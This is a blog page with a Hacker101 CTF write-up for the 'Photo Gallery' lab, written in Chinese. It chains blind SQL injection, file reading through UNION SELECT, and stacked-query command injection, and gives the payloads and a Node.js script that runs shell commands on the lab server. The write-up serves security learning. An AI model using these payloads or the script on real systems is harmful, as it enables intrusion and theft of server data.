<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 4.2.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>Hacker 101 CTF Write Up Part 4 - Photo Gallery - 技術雜記 Technology Notes - Jack Yu | 傑克</title>

<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-NKT99TP');</script>

<script data-ad-client="ca-pub-1515253208026743" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>


    <meta name="description" content="Photo Gallery &lt;!-- more --&gt; 0x00 一開始畫面長這樣  發現原始碼有一個 fetch?id&#x3D;1  點進去網址發現回傳一個 jpg 的 text 檔案  從這可以推測他是用 id 去 mysql 取出 filename 然後讀出來的 加個 &#39; 發現好像沒有 SQL Injection 的存在，但卻出現 500 Internal Server Error 可能">
<meta property="og:type" content="article">
<meta property="og:title" content="Hacker 101 CTF Write Up Part 4 - Photo Gallery">
<meta property="og:url" content="https://yu-jack.github.io/2019/09/10/hacker101-part4/index.html">
<meta property="og:site_name" content="技術雜記 Technology Notes - Jack Yu | 傑克">
<meta property="og:description" content="Photo Gallery &lt;!-- more --&gt; 0x00 一開始畫面長這樣  發現原始碼有一個 fetch?id&#x3D;1  點進去網址發現回傳一個 jpg 的 text 檔案  從這可以推測他是用 id 去 mysql 取出 filename 然後讀出來的 加個 &#39; 發現好像沒有 SQL Injection 的存在，但卻出現 500 Internal Server Error 可能">
<meta property="og:locale" content="zh_TW">
<meta property="og:image" content="https://yu-jack.github.io/images/og_image.png">
<meta property="article:published_time" content="2019-09-10T14:28:20.000Z">
<meta property="article:modified_time" content="2020-01-29T08:25:29.316Z">
<meta property="article:author" content="Jack Yu">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="security">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://yu-jack.github.io/images/og_image.png">







<link rel="icon" href="/images/favicon.svg">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-dark.css">

    
    
<style>body>.footer,body>.navbar,body>.section{opacity:0}</style>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">

    
    
    
    
<link rel="stylesheet" href="/css/back-to-top.css">

    
    
    
    
    
    
    
    <link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
    
    
    


<link rel="stylesheet" href="/css/style.css">
</head>
<body class="is-2-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <!-- <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.svg" alt="Hacker 101 CTF Write Up Part 4 - Photo Gallery" height="28">
            
            </a>
        </div> -->
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">Home</a>
                
                <a class="navbar-item"
                href="/archives">Archives</a>
                
                <a class="navbar-item"
                href="/categories">Categories</a>
                
                <a class="navbar-item"
                href="/tags">Tags</a>
                
            </div>
            
            <div class="navbar-end">
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="文章目錄" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜尋" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-8-widescreen has-order-2 column-main">
<div class="card">
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2019-09-10T14:28:20.000Z">2019-09-10</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/Security/">Security</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    6 分鐘 閱讀文 (大約 926 個字)
                </span>
                
                
                
                <span id="busuanzi_container_page_pv">
                    <span id="busuanzi_value_page_pv"></span> 觀看次數
                </span>
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                Hacker 101 CTF Write Up Part 4 - Photo Gallery
            
        </h1>
        
            <div class="content">
                <h1><span id="photo-gallery">Photo Gallery</span></h1>
<p>&lt;!-- more --&gt;</p>
<h2><span id="0x00">0x00</span></h2>
<p>一開始畫面長這樣<br>
<img src="/images/ctf/part4-photo-1-01.png" alt></p>
<p>發現原始碼有一個 fetch?id=1<br>
<img src="/images/ctf/part4-photo-1-02.png" alt></p>
<p>點進去網址發現回傳一個 jpg 的 text 檔案<br>
<img src="/images/ctf/part4-photo-1-03.png" alt></p>
<p>從這可以推測他是用 id 去 mysql 取出 filename 然後讀出來的<br>
加個 ' 發現好像沒有 SQL Injection 的存在，但卻出現 <code>500 Internal Server Error</code><br>
可能程式有哪邊出錯了，繼續往下測試<br>
<img src="/images/ctf/part4-photo-1-04.png" alt></p>
<p>不過當改下 <code>fetch?id=1 union all select 1</code> 以及 <code>fetch?id=1 union all select 1,2</code> 發生一點不同變化
前者出現跟 <code>fetch?id=1</code> 結果一模一樣 (上圖)<br>
後者卻出現 <code>500 Internal Server Error</code> (下圖)<br>
<img src="/images/ctf/part4-photo-1-05.png" alt>
<img src="/images/ctf/part4-photo-1-06.png" alt></p>
<p>看來就是有 SQL Injection 的問題了<br>
接下來找到可以用 <code>fetch?id=1 and length(database()) = 6</code> 這種方式去判斷後者是否為 true<br>
思路大概跟這篇做法一樣 https://www.hackthis.co.uk/articles/blind-sql-injection<br>
用各種 <code>length()</code> 以及 <code>like '______'</code> 的方式可以找到相對應的值<br>
這邊就直接丟 sqlmap 把整個 table dump 出來了<br>
就發現 FLAG 了
<img src="/images/ctf/part4-photo-1-07.png" alt></p>
<h2><span id="0x01">0x01</span></h2>
<p>這提跟前一提的 <code>fetch?id=1 union all select 1</code> Payload 有關係<br>
前面有提到是透過 id 去撈 filename 回來去顯示<br>
改成 <code>fetch?id=123123 union all select &quot;files/adorable.jpg&quot;</code> 發現可以正確觸發<br>
<img src="/images/ctf/part4-photo-2-01.png" alt></p>
<p>LFI 漏洞就出現了，我可以任意去讀檔案了<br>
本來想說這 php 寫的網站用以下的 payload，結果取得不到 ...<br>
<code>fetch?id=123123 union all select &quot;index.php&quot;</code>
<img src="/images/ctf/part4-photo-2-02.png" alt></p>
<p>後來看提示才知道這是用 uwsgi-nginx-flask-docker image 做的<br>
此 image 原始碼在放在 main.py，所以改成以下 payload 就讀到原始碼，發現第二個 FLAG
<code>fetch?id=123123 union all select &quot;main.py&quot;</code>
<img src="/images/ctf/part4-photo-2-03.png" alt></p>
<h2><span id="0x02">0x02</span></h2>
<p>看到 source code 之後，發現在取得 used space 那邊有 command injection 的問題<br>
<code>subprocess.check_output('du -ch %s || exit 0' % ' '.join('files/' + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit('\n', 1)[-1]</code><br>
只要能在 filename 加上 ; 再加上後面想要執行的指令就可以觸發 CI 的問題了<br>
但要觸發他必須要靠 photos table 裡面的 filename 去觸發<br>
一開始嘗試使用 stacked query 的方式，以下為 payload<br>
<code>541; UPDATE photos SET filename = '; ls ' WHERE id = 3;</code></p>
<p>試了很久完全沒有任何反應，本來以為不是 stacked query 這條路<br>
結果回去翻題目的提示有提到 COMMIT 這個關鍵字<br>
才想到有時候 SQL 指令下 UPDATE 變更完並不會馬上生效<br>
而是要下 <code>COMMIT;</code> UPDATE 的語法才會真正觸發<br>
於是 Payload 改成以下這樣就成功了，下面變成 uwsgi.ini 了<br>
<code>fetch?id=541; UPDATE photos SET filename = &quot;; ls&quot; WHERE id = 3; COMMIT;</code>
<img src="/images/ctf/part4-photo-3-01.png" alt></p>
<p>然後根據 main.py 的 regex 修改一下，然後寫出一個可以一直輸入 command 的 node.js 程式
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">inputFunction</span>(<span class="params">readline</span>) </span>&#123;</span><br><span class="line">    readline.question(<span class="string">`Keep input\n\n`</span>, <span class="keyword">async</span> (command) =&gt; &#123;</span><br><span class="line">        <span class="keyword">const</span> axios = <span class="built_in">require</span>(<span class="string">'axios'</span>)</span><br><span class="line">        <span class="keyword">await</span> axios(&#123;</span><br><span class="line">            method: <span class="string">'GET'</span>,</span><br><span class="line">            url: <span class="string">'http://34.74.105.127/8142a5acbe/fetch'</span>,</span><br><span class="line">            params: &#123;</span><br><span class="line">                id: <span class="string">`541; UPDATE photos SET filename = '; <span class="subst">$&#123;command&#125;</span> | tr "\\n" ";" ' WHERE id = 3; COMMIT;`</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;).then(<span class="function"><span class="params">response</span> =&gt;</span> response.data).catch(<span class="function">(<span class="params">err</span>) =&gt;</span> &#123;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;)</span><br><span class="line">        <span class="keyword">let</span> result = <span class="keyword">await</span> axios(&#123;</span><br><span class="line">            method: <span class="string">'GET'</span>,</span><br><span class="line">            url: <span class="string">'http://34.74.105.127/8142a5acbe/'</span></span><br><span class="line">        &#125;).then(<span class="function"><span class="params">response</span> =&gt;</span> response.data)</span><br><span class="line">        <span class="built_in">console</span>.log(<span class="string">'\n'</span> + result.split(<span class="string">'Space used: '</span>)[<span class="number">1</span>].split(<span class="string">'&lt;/i&gt;&lt;/div&gt;'</span>)[<span class="number">0</span>].replace(<span class="regexp">/;/g</span>, <span class="string">"\n"</span>));  </span><br><span class="line">        inputFunction(readline)</span><br><span class="line">    &#125;)</span><br><span class="line">&#125;</span><br><span class="line">(<span class="function"><span class="params">()</span> =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> readline = <span class="built_in">require</span>(<span class="string">'readline'</span>).createInterface(&#123;</span><br><span class="line">        input: process.stdin,</span><br><span class="line">        output: process.stdout</span><br><span class="line">    &#125;)</span><br><span class="line">    inputFunction(readline)</span><br><span class="line">&#125;)()</span><br></pre></td></tr></table></figure></p>
<p>但是逛了老半天 ... 完全不知道 flag 放在哪裡<br>
跑回去看題目提示到 『enviroment』，才想到有可能放在應用程式裡面的環境<br>
最後下一個 <code>printenv</code> 就拿到 FLAG 了 ！
<img src="/images/ctf/part4-photo-3-02.png" alt></p>
<p>簡單 demo 影片<br>
<img src="/images/ctf/part4-photo-demo.gif" alt></p>
<h1><span id="後記">後記</span></h1>
<p>這題蠻有趣的，學到 stacked query、command injection 以及 LFI
不過過程中有些真的不知道怎麼做，跑去看提示才知道<br>
不然真的瞎子摸象摸不太出來 QQ</p>

            </div>
        
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/CTF/" rel="tag">CTF</a>, <a class="has-link-grey -link" href="/tags/security/" rel="tag">security</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>





<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/2019/09/14/hacker101-part5/">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">Hacker 101 CTF Write Up Part 5 - Cody&#39;s First Blog</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/2019/09/08/hacker101-part3/">
                <span class="level-item">Hacker 101 CTF Write Up Part 3 - Ticketastic Live Instance</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">評論</h3>
        
<script>
    var disqus_config = function () {
        this.page.url = 'https://yu-jack.github.io/2019/09/10/hacker101-part4/';
        this.page.identifier = '2019/09/10/hacker101-part4/';
    };
    (function() {
        var d = document, s = d.createElement('script');  
        s.src = '//' + 'yu-jack' + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>

<div id="disqus_thread">
    
    <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>
    </div>
</div>
</div>
                





<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left is-sticky">
    
        
    
        
            

    <div class="card widget" id="toc">
        <div class="card-content">
            <div class="menu">
                <h3 class="menu-label">
                    文章目錄
                </h3>
                <ul class="menu-list"><li>
        <a class="is-flex" href="#photo-gallery">
        <span class="has-mr-6">1</span>
        <span>Photo Gallery</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#0x00">
        <span class="has-mr-6">1.1</span>
        <span>0x00</span>
        </a></li><li>
        <a class="is-flex" href="#0x01">
        <span class="has-mr-6">1.2</span>
        <span>0x01</span>
        </a></li><li>
        <a class="is-flex" href="#0x02">
        <span class="has-mr-6">1.3</span>
        <span>0x02</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#後記">
        <span class="has-mr-6">2</span>
        <span>後記</span>
        </a></li></ul>
            </div>
        </div>
    </div>

        
    
        
    
        
    
    
        <div class="column-right-shadow is-hidden-widescreen ">
        
            
        
        </div>
    
</div>


                





<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-3 column-right ">
    
        
    
    
</div>


            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <p class="is-size-7">
                &copy; 2020 Jack Yu&nbsp;
                Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a> & Jack Yu
                
                </p>
            </div>
            <div class="level-end">
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-TW");</script>


<script>
var IcarusThemeSettings = {
    site: {
        url: 'https://yu-jack.github.io',
        external_link: {"enable":true,"exclude":[]}
    },
    article: {
        highlight: {
            clipboard: true,
            fold: 'unfolded'
        }
    }
};
</script>


<script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script>





<script src="/js/animation.js"></script>



<script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
<script src="/js/gallery.js" defer></script>



<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>


<a id="back-to-top" title="回到頁首" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>














<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="請輸入關鍵字..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '頁面',
                CATEGORIES: '分類',
                TAGS: '標籤',
                UNTITLED: '(無標題)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</body>
</html>